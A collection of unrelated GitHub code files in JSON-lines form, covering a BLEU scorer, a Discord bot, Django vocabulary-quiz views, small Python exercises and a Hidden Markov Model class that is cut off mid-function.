easygui.msgbox('Smooth Backup Encrypt and desencrypt')\n \n src = easygui.enterbox('Source')\n dst = easygui.enterbox('Destination')\n\n copy_files(patt, src, dst)\n time.sleep(1)\n\n elif(os.name == 'posix'): # if it's Unix systems\n # se for sistemas Unix \n \n #srce = raw_input('Source path: ')\n #destin = raw_input('Destination path: ')\n \n #easygui.msgbox('Smooth Baackup')\n \n srce = easygui.enterbox('Source: ')\n destin = easygui.enterbox('Destination: ')\n\n copy_files(patt, srce, destin)\n time.sleep(2)\n\n else:\n\n pass\n \n# calling the functions... simple way...\n\ndef main():\n\n while True:\n\n try:\n\n done_cp()\n\n except:\n\n pass\n\n try:\n \n done_crypt()\n\n except:\n\n return\n \n \nif __name__ == \"__main__\":\n\n main()\n","repo_name":"mrx6SO/backup_then_encrypt","sub_path":"cp_cpt.py","file_name":"cp_cpt.py","file_ext":"py","file_size_in_byte":6961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"225676905","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n# **************************\n# * Author : baiyyang\n# * Email : baiyyang@163.com\n# * Description : 实现bleu,支持计算中文和英文\n# * create time : 2018/5/11下午3:47\n# * file name : bleu.py\n\n\nimport os\nimport argparse\nimport math\n\n\ndef read_data(candidate_filename, reference_file):\n \"\"\"\n 读取候选文件和参考文件\n :param candidate_filename: 候选文件\n :param reference_file: 参考文件,可以为文件夹,或者是单个的文件\n :return:\n \"\"\"\n candidates = []\n references = []\n with open(candidate_filename, \"r\", encoding=\"utf-8\") as fr:\n for line in fr:\n candidates.append(line.strip())\n if \".txt\" in reference_file:\n with open(reference_file, \"r\", encoding=\"utf-8\") as fr:\n reference = []\n for line in fr:\n reference.append(line.strip())\n references.append(reference)\n else:\n for root, _, files in os.walk(reference_file):\n for file in files:\n reference = []\n with open(os.path.join(root, file), \"r\", encoding=\"utf-8\") as fr:\n for line in fr:\n reference.append(line.strip())\n references.append(reference)\n return candidates, references\n\n\ndef calculate_ngram(candidates, references, n, language):\n count_clip = 0\n count = 0\n for index, candidate in enumerate(candidates):\n references_list = lines2dic(references, index, n, language)\n if language == \"en\":\n words = candidate.split()\n else:\n words = candidate\n limit = len(words) - n + 1\n candidate_dic = {}\n for i in range(limit):\n key = \" \".join(words[i: i+n]).lower() if language == \"en\" else words[i: i+n]\n if key in candidate_dic.keys():\n candidate_dic[key] += 1\n else:\n candidate_dic[key] = 1\n count_clip += clip(candidate_dic, references_list)\n count += limit\n if count_clip == 0:\n pr = 0\n else:\n pr = float(count_clip) / count\n return pr\n\n\ndef brevity_penalty(candidates, references, language):\n c = 0\n r = 0\n for index, candidate in enumerate(candidates):\n c_length = len(candidate.split()) if language == \"en\" else len(candidate)\n reference_index = [reference[index] for reference in references]\n r_lengths = [len(r.split()) if language == \"en\" else len(r) for r in reference_index]\n c += c_length\n r += match_reference(c_length, r_lengths)\n if c > r:\n bp = 1\n else:\n bp = math.exp(1 - float(r) / c)\n return bp\n\n\ndef match_reference(candidate_len, reference_lens):\n \"\"\"\n 计算当c<=r时,最佳匹配的r的长度\n :param candidate_len:\n :param reference_lens:\n :return:\n \"\"\"\n best_len = abs(reference_lens[0] - candidate_len)\n best_ref = reference_lens[0]\n for length in reference_lens:\n if abs(length - candidate_len) < best_len:\n best_len = abs(length - candidate_len)\n best_ref = length\n return best_ref\n\n\ndef clip(candidate, references):\n count = 0\n for cand in candidate.keys():\n cand_value = candidate[cand]\n max_count = 0\n for reference in references:\n if cand in reference.keys():\n max_count = max(reference[cand], max_count)\n count += min(max_count, cand_value)\n return count\n\n\ndef lines2dic(references, index, n, language):\n reference_list = []\n for reference in references:\n reference_dic = {}\n line = reference[index]\n if language == \"en\":\n words = line.split()\n else:\n words = line\n limit = len(words) - n + 1\n for i in range(limit):\n key = \" \".join(words[i: i+n]).lower() if language == \"en\" else words[i: i+n]\n if key in reference_dic.keys():\n reference_dic[key] += 1\n else:\n reference_dic[key] = 1\n reference_list.append(reference_dic)\n return reference_list\n\n\ndef geometric_mean(precisions):\n return math.exp(sum([math.log(p) if p != 0 else -math.inf for p in precisions]) / len(precisions))\n\n\ndef bleu(candidate, references, language):\n precisions = []\n for i in range(1, 5):\n pr = calculate_ngram(candidate, references, i, language)\n precisions.append(pr)\n bp = brevity_penalty(candidate, references, language)\n return geometric_mean(precisions) * bp\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"BLEU calculate\")\n parser.add_argument(\"candidate\", help=\"candidate file\", type=str)\n parser.add_argument(\"reference\", help=\"reference file or dir\", type=str)\n parser.add_argument(\"language\", help=\"the language of evaluation, include en/ch\", type=str)\n args = parser.parse_args()\n can_file = args.candidate\n ref_file = args.reference\n lang = args.language\n candidate, references = read_data(can_file, ref_file)\n bleu = bleu(candidate, references, lang)\n print(\"BLEU: {}\".format(bleu))\n\n","repo_name":"baiyyang/BLEU","sub_path":"bleu.py","file_name":"bleu.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"78"} +{"seq_id":"15190897418","text":"import re\n\n\ndef strip_str(str, format_as):\n \"\"\"\n Removes unnecessary whitespaces from given `str`\n Args:\n str: string to be formatted\n format_as: [\n type of formatting to be done. takes either `url`\n or `normal`. use `url` to format URLs and `normal`\n to do normal string formatting\n ]\n \"\"\"\n stripped_str = \"\"\n\n if format_as == \"url\":\n stripped_str = re.sub(\" +\", \"\", str)\n elif format_as == \"normal\":\n stripped_str = re.sub(\" +\", \" \", str)\n\n return stripped_str\n","repo_name":"Cimmanuel/animated-adventure","sub_path":"woice/chat/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1878047137","text":"print('ex0905')\nfname = input('Enter File Name: ')\nif len(fname) < 1 :\n fname = 'mbox-short.txt'\n\nschool = dict()\n\nfhand = open(fname)\nfor line in fhand:\n line = line.rstrip()\n if not line.startswith('From ') :\n continue\n line = line.split()\n email = line[1]\n atpos = email.find(\"@\")\n email = email[atpos+1:]\n school[email] = school.get(email, 0) + 1\nprint(school)\n","repo_name":"kyawsaw/py4e","sub_path":"chapter09/ex0905.py","file_name":"ex0905.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36446330606","text":"import pdb\nimport random\n\nimport numpy as np\nfrom torch.utils import data\nfrom loader.metadata import ImagenetMetadata\nfrom loader.loader import DataFromMetadata, ClassBalancedSampler\n\nIMAGENET_DIR = '/v9/whshin/imagenet_l2s_84_84'\nDEVKIT_DIR = '/v9/whshin/imagenet/ILSVRC2012_devkit_t12'\n\n\ndef split_meta(meta, mode):\n if mode == 'class':\n # [episode] i\n s, q = meta.split_classes(0.3) # meta-s : meta_q = 30 : 70\n # [meta_train] j\n s_load = s.get_loader(batch_size=128)\n import pdb; pdb.set_trace()\n # s = s.sample_classes(0.5) # 35 x 10 = 350\n\n\n elif mode == 'instance':\n s, q = meta.split_instances(0.7)\n ss, sq = s.split_instances(0.7)\n qs, qq = q.split_instances(0.7)\n print(f'Split mode: {mode}')\n print('Number of classes:')\n print(f'\\ts({len(s)}), q({len(q)})')\n print(f'\\tss({len(ss)}), qs({len(qs)})')\n print(f'\\tsq({len(sq)}), qq({len(qq)})')\n print('Number of samples in the first class:')\n print(f'\\ts({s.idx_to_len[s.abs_idx[0]]}), '\n f'q({q.idx_to_len[q.abs_idx[0]]})')\n print(f'\\tss({ss.idx_to_len[ss.abs_idx[0]]}), '\n f'qs({qs.idx_to_len[qs.abs_idx[0]]})')\n print(f'\\tsq({sq.idx_to_len[sq.abs_idx[0]]}), '\n f'qq({qq.idx_to_len[qq.abs_idx[0]]})')\n return s, q, ss, sq\n\n\nsplit = 'class'\nrandom.seed(1)\nnp.random.seed(1)\nmeta = ImagenetMetadata.load_or_make(\n data_dir=IMAGENET_DIR, devkit_dir=DEVKIT_DIR, remake=False)\nm_train, m_test = meta.split_classes(0.1)\n# s, q, ss, sq = split_meta(m_train, 'instance')\ns, q, ss, sq = split_meta(m_train, 'class')\n\n\n\n\n\nimport pdb; pdb.set_trace()\n\npdb.set_trace()\nprint('end')\n","repo_name":"ricoshin/learn2sample","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"20930835495","text":"myUniqueList = []\r\nmyRejectList = []\r\nAddValue = False\r\ndef addRejectValue(Var):\r\n #adding Rejected(Non unique or repeated values) Values to a separate List\r\n return myRejectList.append(Var)\r\n\r\n\r\ndef addItem(Var):\r\n if Var in myUniqueList:\r\n addRejectValue(Var)\r\n AddValue = False\r\n print(\"myRejectList:\\t\",myRejectList)\r\n return AddValue\r\n else:\r\n myUniqueList.append(Var)\r\n AddValue = True\r\n print(\"myUniqueList:\\t\",myUniqueList)\r\n return AddValue\r\n\r\n\r\n\r\n\r\n\r\naddItem(2)\r\naddItem(3.6789)\r\naddItem(\"Lists\")\r\naddItem(2)\r\naddItem(3.6789)\r\naddItem(\"HomeworkAssignment #4\")\r\n\r\n","repo_name":"madhurlittu/Python_is_Easy_Pirple","sub_path":"Homework Assignmentt #4.py","file_name":"Homework Assignmentt #4.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15794713649","text":"from discord.ext.commands.core import command\r\nfrom discord.ext import commands\r\n# from . import mal_anime\r\n# from . import mal_manga\r\n\r\nimport discord\r\nimport os\r\nimport platform\r\nimport subprocess\r\nimport src.maplestory.maple as maple\r\nimport src.youtube.youtube as yt\r\nimport src.twitterFetcher.main as twitter_sniffer\r\nimport src.discord.mal_anime as mal_anime\r\nimport src.discord.mal_manga as mal_manga\r\nimport src.twitter_user_storage.user_storage as user_storage\r\nimport asyncio\r\n\r\ndiscord_bot_token = os.environ.get (\"YUNA_DISCORD_SECRET\")\r\nbot_command = commands.Bot (command_prefix=\"->>\")\r\n\r\n@bot_command.event\r\nasync def on_ready ():\r\n print (\"Logging in as \", bot_command.user.name)\r\n print (\"id is \", bot_command.user.id)\r\n print (\"--------\")\r\n\r\n@bot_command.command (name = \"restart\", alias = [\"r\"], help = \"Restarts the bot. Only the owner can do this.\")\r\n@commands.is_owner()\r\nasync def restart (ctx):\r\n await ctx.send (\"Restarting my internal brain chemistry...\")\r\n\r\n current_os_platform = platform.system()\r\n\r\n if current_os_platform == \"Windows\":\r\n print (\"Current directory is: \", str(os.getcwd()))\r\n subprocess.run([\"Start.bat\"], shell = True)\r\n else:\r\n subprocess.run([\"Start.sh\"])\r\n\r\n@bot_command.command (name = \"shutdown\", help = \"Shuts down bot. Only the owner can do this.\")\r\n@commands.is_owner()\r\nasync def shutdown (ctx):\r\n await ctx.send (\"I'm going to take a nap now.\")\r\n await bot_command.logout()\r\n\r\n@bot_command.command (name = \"anime\", help = \"Search the given anime on MyAnimeList\")\r\nasync def anime (ctx, anime_name):\r\n anime_query = mal_anime.AnimeQuery (anime_name)\r\n\r\n await ctx.send (f\"**The anime you're looking for is: {anime_query.search_anime_title()} **\")\r\n await ctx.send (anime_query.search_anime_url())\r\n await ctx.send (f\"**Anime score is: {anime_query.search_anime_score ()} **\")\r\n\r\n@bot_command.command (name = \"manga\", help = \"Searches the given manga on MyAnimeList\")\r\nasync def manga (ctx, manga_name):\r\n manga_query = mal_manga.MangaQuery (manga_name)\r\n\r\n await ctx.send (f\"**The manga you're looking for is: {manga_query.search_manga_title()} **\")\r\n await ctx.send (manga_query.serach_manga_url())\r\n await ctx.send (f\"**Manga score is: {manga_query.search_manga_score()} **\")\r\n\r\n@bot_command.command(name = \"maple\", help = \"Returns the update from Maplestory.\", alias = [\"maplestory\"])\r\nasync def maplestory(ctx):\r\n maple_news = maple.get_latest_maple_news()\r\n\r\n await ctx.send(f\"**Here's the update from Maplestory.** {maple_news}\")\r\n\r\n@bot_command.command(name=\"youtube\", alias = [\"yt\"], help = \"Returns the video requested.\")\r\nasync def youtube(ctx, *,video_title):\r\n discord_id = os.environ.get(\"MY_DISCORD_ID\")\r\n\r\n try:\r\n entire_message = \"\".join(video_title)\r\n youtube_video = yt.get_requested_video(entire_message)\r\n\r\n await ctx.send(youtube_video)\r\n await asyncio.sleep(10)\r\n except Exception as e:\r\n print (e)\r\n\r\n await ctx.send(f\"<@!{discord_id}> Uh-oh some moron tried to break the command. SMH\")\r\n\r\n@bot_command.command(name=\"twitter_add\", help = \"Stores the usernames for Twitter\")\r\nasync def add_twitter_username(ctx, twitter_usernames):\r\n if len(twitter_usernames) > 0:\r\n result = user_storage.insert(twitter_usernames)\r\n await ctx.send(result)\r\n else:\r\n await ctx.send(\"Twitter Username cannot be 0.\")\r\n\r\n@bot_command.command(name = \"list\", help = \"Returns all of the stored usernames from database\")\r\nasync def print_twitter_usernames(ctx):\r\n results = user_storage.print_all_entries()\r\n\r\n # Converted tuple into a list.\r\n twitter_usernames_list = list(results)\r\n\r\n # Using List Comprehension to remove tuple from list.\r\n # We loop through twice to first get rid of the list and the second loop to go into the tuple.\r\n twitter_list_output = [twitter_names for item in twitter_usernames_list for twitter_names in item]\r\n\r\n await ctx.send(twitter_list_output)\r\n\r\n@bot_command.command(name = \"twitter_update\", help = \"Updates an entry in database. Format \")\r\n@commands.is_owner()\r\nasync def update_twitter_name(ctx, old_username, new_username):\r\n if len(old_username) and len(new_username) > 0:\r\n result = user_storage.update_entry_from_table(old_username, new_username)\r\n\r\n await ctx.send(result)\r\n else:\r\n await ctx.send(\"Old username or new username cannot be empty.\")\r\n\r\n@bot_command.command(name = \"twitter_remove\", help = \"Removes desired username from database.\")\r\n@commands.is_owner()\r\nasync def remove_twitter_username(ctx, twitter_name):\r\n if len(twitter_name) > 0:\r\n result = user_storage.delete_entry_from_table(twitter_name)\r\n\r\n await ctx.send(result)\r\n else:\r\n await ctx.send(\"Twitter name cannot be empty.\")\r\n\r\n@bot_command.command(name = \"twitter_clear\", help = \"Permanently removes everything from database! Proceed with caution\")\r\n@commands.is_owner()\r\nasync def clear_twitter_database(ctx):\r\n user_storage.clear_database()\r\n await ctx.send(\"**I've erased everything from database. If that was a mistake, then looks like you have to repopulate the table -Get fucked KEKW-.**\")\r\n\r\n@bot_command.command(name=\"twitter\", help = \"Retrevie latest tweet from set user\")\r\nasync def twitter(ctx, twitter_user):\r\n # twitter_sniffer\r\n\r\n # await ctx.send()\r\n pass","repo_name":"KevinLu19/Discord_Bot","sub_path":"src/discord/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4025796871","text":"\ndef setDictData(url):\n # 获取数据\n # ([a-z]\\w+) --> '$1'\n dict = {\n\n 'id' :'100',\n 'acode' :'cn', # 区域信息 \n 'scode' :'10', # 内容栏目\n 'subscode' :'0', # 内容副栏目\n 'title' :'测试文章1', # 内容标题\n 'titlecolor' :'#333333', # 标题颜色\n 'subtitle' :'测试副标题', # 副标题\n 'filename' :'测试链接', # 自定义路径\n 'author' :'厚德', # 作者\n 'source' :'本站', # 来源\n 'outlink' :'原始链接', # 跳转外链���\n 'date' :'时间', # 发布时间\n 'ico' :'', # 缩略图\n 'pics' :'', # 轮播多图\n 'content' :'文章', # 内容\n 'enclosure' :'附件', # 附件\n 'keywords' :'动机', # 页面关键字\n 'description' :'动机', # 页面描述\n 'status' :'1', # 状态\n 'istop' :'0', # 置顶\n 'isrecommend' :'0', # 推荐\n 'isheadline' :'0' # 头条\n }\n\n return dict\n\ndef setSmallDict(id):\n dict = {\n 'id' : id,\n 'acode':'cn',\n 'scode':'10',\n 'title':' 测试题目'\n }\n return dict\n\ndef dict2SQL(table,my_dict,):\n COLstr='' #列的字段\n ROWstr='' #行字段\n\n ColumnStyle=' VARCHAR(20)'\n for key in my_dict.keys():\n COLstr=COLstr+' '+key+ColumnStyle+',' \n ROWstr=(ROWstr+'\"%s\"'+',')%(my_dict[key])\n\n sql4 = \"INSERT INTO %s VALUES (%s)\"%(table,ROWstr[:-1])\n print(sql4)\n\n return sql4\n\n\n\n\n\n\n","repo_name":"SChen1024/CMS_article","sub_path":"sina/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9524580","text":"import re\n\nchat_list = []\nwith open('../private-information/chat_hist.txt', encoding=\"utf8\") as f:\n lines = f.readlines()\n chat_list.append(lines)\n\ncarryover = \"\"\nhasCarry = False\noutput_chatlist = []\n\nfor i in chat_list[0][::-1]:\n if re.match('\\d\\d\\d\\d/\\d\\d/\\d\\d, \\d\\d:\\d\\d -',i):\n if hasCarry:\n i = i.strip() + \" \" + carryover + \"\\n\"\n hasCarry = False\n carryover = \"\"\n output_chatlist.append(i)\n else:\n hasCarry = True\n carryover = i.strip() + \" \" + carryover\n\nwith open(\"../private-information/chat_hist_nocarry.txt\", mode=\"w\", encoding=\"utf8\") as f:\n for line in output_chatlist[::-1]: f.write(line)","repo_name":"Scotts-Bots/AI-Chatbots","sub_path":"bert-discord-bot/remove_multiline_carry.py","file_name":"remove_multiline_carry.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"17647830439","text":"from django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponse\n\nfrom django.template import RequestContext, loader\n\nfrom django.utils import timezone\n\n#models\nfrom vocabTest.models import Word, Question, LevenshteinPair\n\n#other python libraries\nfrom random import choice, randint\n\n'''session variables:\nquestions_asked: number of questions asked in the quiz so far\ntotal_questions: number of questions to be asked in the quiz\ncorrect: was the last question answered correctly\nproblem_quiz: does the user want to review words that they struggle with\n'''\n\n# Create your views here.\ndef index(request):\n request.session['questions_asked'] = 0;\n request.session['problem_quiz'] = False;\n request.session['total_questions'] = 50;\n request.session['correct'] = None;\n return render(request, 'vocabTest/index.html');\n\ndef viewWords(request):\n # obtain the full list of words CHANGE TO GET REQUESTS\n words = Word.objects.all().order_by('word')\n return render(request, 'vocabTest/viewwords.html', {'words':words});\n \ndef quiz(request, **kwargs):\n try:\n # if the problematic quiz was chosen\n request.session['problem_quiz'] = kwargs['problem']\n except:\n #do nothing otherwise\n pass;\n #print(request.session['problem_quiz'])\n #handles when to stop the quiz\n if request.session['questions_asked'] len(word2):\n word1,word2 = word2,word1\n #create and initialize a 2d array\n cost = 100\n total = [[0 for i in range(len(word2))] for j in range(len(word1))]\n for i in range(len(word1)):\n for j in range(len(word2)):\n # calculate the cost of the current location\n if word1[i] != word2[j]:\n cost = 1\n else:\n cost = 0\n \n # base cases\n if i==0 and j==0:\n total[i][j] = cost\n elif i==0 and j!=0:\n total[i][j] = total[i][j-1] + cost\n elif i!=0 and j==0:\n total[i][j] = total[i-1][j] + cost\n else:\n total[i][j] = min(total[i-1][j], total[i-1][j-1], total[i][j-1]) + cost\n return total[len(word1)-1][len(word2)-1] \n \ndef answer(request, question_id):\n #obtain the relevant question\n q = get_object_or_404(Question, pk=question_id)\n wordUpdate = q.word_set.all()\n ans = wordUpdate[0]\n try:\n #convert to int, substring the first part\n if q.right_choice == int(request.POST['choice'][0]):\n request.session['correct']=True\n ans.num_correct = ans.num_correct + 1\n print(\"CORRECT {0}\".format(ans.num_correct))\n else:\n # set the last wrong choice, substring after the choice number\n ans.last_wrong_choice = request.POST['choice'][1:len(request.POST['choice'])]\n request.session['correct']=False\n print(\"INCORRECT\")\n except:\n #user gave invalid input\n return render(request, 'vocabTest/quiz.html', {'word':wordUpdate[0], 'question':q, 'choices':[q.choice_1, q.choice_2, q.choice_3, q.choice_4, q.choice_5], 'error_message':'You didn\\'t select an option'})\n \n ans.is_a_problem()\n ans.save()\n \n #delete the question\n q.delete()\n \n return quiz(request);\n \n ","repo_name":"woodphil/djangoVocab","sub_path":"vocabTest/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42258457517","text":"\"\"\"\nFilename: HMM.py\nVersion: 1.0\nDate: 2018/3/9\n\nDescription: Implements unsupervised HMM learning and emission. Adapted from \n Homework 6 solutions.\n\nAuthor(s): Andrew Kang, Garret Sullivan\nOrganization: California Institute of Technology\n\"\"\"\n\nimport numpy as np\nimport random\n\nclass HiddenMarkovModel:\n '''\n Class implementation of Hidden Markov Models.\n '''\n\n def __init__(self, A, O):\n '''\n Initializes an HMM. Assumes the following:\n - States and observations are integers starting from 0. \n - There is a start state (see notes on A_start below). There\n is no integer associated with the start state, only\n probabilities in the vector A_start.\n - There is no end state. \n\n Arguments:\n A: Transition matrix with dimensions L x L.\n The (i, j)^th element is the probability of\n transitioning from state i to state j. Note that\n this does not include the starting probabilities.\n\n O: Observation matrix with dimensions L x D.\n The (i, j)^th element is the probability of\n emitting observation j given state i.\n\n Parameters:\n L: Number of states.\n\n D: Number of observations.\n \n A: The transition matrix.\n \n O: The observation matrix.\n \n A_start: Starting transition probabilities. The i^th element\n is the probability of transitioning from the start\n state to state i. For simplicity, we assume that\n this distribution is uniform.\n '''\n\n self.L = len(A)\n self.D = len(O[0])\n self.A = A\n self.O = O\n self.A_start = [1. / self.L for _ in range(self.L)]\n\n\n def forward(self, x, normalize=False):\n '''\n Uses the forward algorithm to calculate the alpha probability\n vectors corresponding to a given input sequence.\n\n Arguments:\n x: Input sequence in the form of a list of length M,\n consisting of integers ranging from 0 to D - 1.\n\n normalize: Whether to normalize each set of alpha_j(i) vectors\n at each i. This is useful to avoid underflow in\n unsupervised learning.\n\n Returns:\n alphas: Vector of alphas.\n\n The (i, j)^th element of alphas is alpha_j(i),\n i.e. the probability of observing prefix x^1:i\n and state y^i = j.\n\n e.g. alphas[1][0] corresponds to the probability\n of observing x^1:1, i.e. the first observation,\n given that y^1 = 0, i.e. the first state is 0.\n '''\n\n M = len(x) # Length of sequence.\n alphas = [[0. for _ in range(self.L)] for _ in range(M + 1)]\n\n # Note that alpha_j(0) is already correct for all j's.\n # Calculate alpha_j(1) for all j's.\n for curr in range(self.L):\n alphas[1][curr] = self.A_start[curr] * self.O[curr][x[0]]\n\n # Calculate alphas throughout sequence.\n for t in range(1, M):\n # Iterate over all possible current states.\n for curr in range(self.L):\n prob = 0\n\n # Iterate over all possible previous states to accumulate\n # the probabilities of all paths from the start state to\n # the current state.\n for prev in range(self.L):\n prob += alphas[t][prev] \\\n * self.A[prev][curr] \\\n * self.O[curr][x[t]]\n\n # Store the accumulated probability.\n alphas[t + 1][curr] = prob\n\n if normalize:\n norm = sum(alphas[t + 1])\n for curr in range(self.L):\n alphas[t + 1][curr] /= norm\n\n return alphas\n\n\n def backward(self, x, normalize=False):\n '''\n Uses the backward algorithm to calculate the beta probability\n vectors corresponding to a given input sequence.\n\n Arguments:\n x: Input sequence in the form of a list of length M,\n consisting of integers ranging from 0 to D - 1.\n\n normalize: Whether to normalize each set of alpha_j(i) vectors\n at each i. This is useful to avoid underflow in\n unsupervised learning.\n\n Returns:\n betas: Vector of betas.\n\n The (i, j)^th element of betas is beta_j(i), i.e.\n the probability of observing prefix x^(i+1):M and\n state y^i = j.\n\n e.g. betas[M][0] corresponds to the probability\n of observing x^M+1:M, i.e. no observations,\n given that y^M = 0, i.e. the last state is 0.\n '''\n\n M = len(x) # Length of sequence.\n betas = [[0. for _ in range(self.L)] for _ in range(M + 1)]\n\n # Initialize initial betas.\n for curr in range(self.L):\n betas[-1][curr] = 1\n\n # Calculate betas throughout sequence.\n for t in range(-1, -M - 1, -1):\n # Iterate over all possible current states.\n for curr in range(self.L):\n prob = 0\n\n # Iterate over all possible next states to accumulate\n # the probabilities of all paths from the end state to\n # the current state.\n for nxt in range(self.L):\n if t == -M:\n prob += betas[t][nxt] \\\n * self.A_start[nxt] \\\n * self.O[nxt][x[t]]\n\n else:\n prob += betas[t][nxt] \\\n * self.A[curr][nxt] \\\n * self.O[nxt][x[t]]\n\n # Store the accumulated probability.\n betas[t - 1][curr] = prob\n\n if normalize:\n norm = sum(betas[t - 1])\n for curr in range(self.L):\n betas[t - 1][curr] /= norm\n\n return betas\n\n\n def unsupervised_learning(self, X, N_iters):\n '''\n Trains the HMM using the Baum-Welch algorithm on an unlabeled\n datset X. Note that this method does not return anything, but\n instead updates the attributes of the HMM object.\n\n Arguments:\n X: A dataset consisting of input sequences in the form\n of lists of length M, consisting of integers ranging\n from 0 to D - 1. In other words, a list of lists.\n\n N_iters: The number of iterations to train on.\n '''\n\n # Note that a comment starting with 'E' refers to the fact that\n # the code under the comment is part of the E-step.\n\n # Similarly, a comment starting with 'M' refers to the fact that\n # the code under the comment is part of the M-step.\n\n for iteration in range(1, N_iters + 1):\n if iteration % 10 == 0:\n print(\"Iteration: \" + str(iteration))\n\n # Numerator and denominator for the update terms of A and O.\n A_num = [[0. for i in range(self.L)] for j in range(self.L)]\n O_num = [[0. for i in range(self.D)] for j in range(self.L)]\n A_den = [0. for i in range(self.L)]\n O_den = [0. for i in range(self.L)]\n\n # For each input sequence:\n for x in X:\n M = len(x)\n # Compute the alpha and beta probability vectors.\n alphas = self.forward(x, normalize=True)\n betas = self.backward(x, normalize=True)\n\n # E: Update the expected observation probabilities for a\n # given (x, y).\n # The i^th index is P(y^t = i, x).\n for t in range(1, M + 1):\n P_curr = [0. for _ in range(self.L)]\n \n for curr in range(self.L):\n P_curr[curr] = alphas[t][curr] * betas[t][curr]\n\n # Normalize the probabilities.\n norm = sum(P_curr)\n for curr in range(len(P_curr)):\n P_curr[curr] /= norm\n\n for curr in range(self.L):\n if t != M:\n A_den[curr] += P_curr[curr]\n O_den[curr] += P_curr[curr]\n O_num[curr][x[t - 1]] += P_curr[curr]\n\n # E: Update the expectedP(y^j = a, y^j+1 = b, x) for given (x, y)\n for t in range(1, M):\n P_curr_nxt = [[0. for _ in range(self.L)] for _ in range(self.L)]\n\n for curr in range(self.L):\n for nxt in range(self.L):\n P_curr_nxt[curr][nxt] = alphas[t][curr] \\\n * self.A[curr][nxt] \\\n * self.O[nxt][x[t]] \\\n * betas[t + 1][nxt]\n\n # Normalize:\n norm = 0\n for lst in P_curr_nxt:\n norm += sum(lst)\n for curr in range(self.L):\n for nxt in range(self.L):\n P_curr_nxt[curr][nxt] /= norm\n\n # Update A_num\n for curr in range(self.L):\n for nxt in range(self.L):\n A_num[curr][nxt] += P_curr_nxt[curr][nxt]\n\n for curr in range(self.L):\n for nxt in range(self.L):\n self.A[curr][nxt] = A_num[curr][nxt] / A_den[curr]\n\n for curr in range(self.L):\n for xt in range(self.D):\n self.O[curr][xt] = O_num[curr][xt] / O_den[curr]\n\n\n def generate_emission(self, M):\n '''\n Generates an emission of length M, assuming that the starting state\n is chosen uniformly at random. \n\n Arguments:\n M: Length of the emission to generate.\n\n Returns:\n emission: The randomly generated emission as a list.\n\n states: The randomly generated states as a list.\n '''\n\n emission = []\n state = random.choice(range(self.L))\n states = []\n\n for t in range(M):\n # Append state.\n states.append(state)\n\n # Sample next observation.\n rand_var = random.uniform(0, 1)\n next_obs = 0\n\n while rand_var > 0:\n rand_var -= self.O[state][next_obs]\n next_obs += 1\n\n next_obs -= 1\n emission.append(next_obs)\n\n # Sample next state.\n rand_var = random.uniform(0, 1)\n next_state = 0\n\n while rand_var > 0:\n rand_var -= self.A[state][next_state]\n next_state += 1\n\n next_state -= 1\n state = next_state\n\n return emission, states\n\n\n def generate_line(self, syllables, syllable_dict, reverse=False, initial=None):\n '''\n Generates an emission with a set number of syllables, assuming that the \n starting state is chosen uniformly at random. \n\n Arguments:\n syllables: Number of syllables in the emission to generate.\n syllable_dict: Information about the syllables of each word.\n reverse: Whether to perform generaation forwards or backwards.\n initial: The initial observation in the generated output.\n\n Returns:\n emission: The randomly generated emission as a list.\n\n states: The randomly generated states as a list.\n '''\n \n emission = []\n states = []\n state = None\n \n normal_syllable_count = [0]\n end_syllable_count = [0]\n \n # Reverse the transitions matrix if we're generating backwards\n transitions = self.A\n if reverse:\n #transitions = list(map(list, zip(*self.A)))\n transitions = np.array(transitions).T.tolist()\n \n # Renormalize each row of the transitions matrix\n for i in range(len(transitions)):\n transitions[i] = [transitions[i][j]/sum(transitions[i]) for j in range(len(transitions[i]))] \n \n if initial != None:\n # We have the initial word for this line already\n emission.append(initial)\n \n normal_syllable_count = syllable_dict[initial]['normal']\n end_syllable_count = normal_syllable_count + syllable_dict[initial]['end'] \n \n # Find the probability that a given state would generate this word\n prob_states = list(map(list, zip(*self.O)))[initial]\n prob_states = [prob_states[i]/sum(prob_states) for i in range(len(prob_states))]\n \n # Sample the initial state for this word\n rand_var = random.uniform(0, 1)\n initial_state = 0\n\n while rand_var > 0:\n rand_var -= prob_states[initial_state]\n initial_state += 1\n\n initial_state -= 1\n states.append(initial_state)\n \n # Sample the next state as well using the initial state\n rand_var = random.uniform(0, 1)\n next_state = 0\n\n while rand_var > 0:\n rand_var -= transitions[initial_state][next_state]\n next_state += 1\n\n next_state -= 1\n state = next_state\n else:\n # We don't have anything; just pick an initial state\n state = random.choice(range(self.L))\n \n # Generate words until we reach the requested number of syllables\n while syllables not in end_syllable_count:\n # Add the state to the beginning or end of the state list\n if reverse:\n states.insert(0, state)\n else:\n states.append(state)\n\n # Sample next observation.\n rand_var = random.uniform(0, 1)\n next_obs = 0\n \n # Zero out the weights of words whose syllables would not fit in this line\n possible_emissions = list(self.O[state])\n for i in 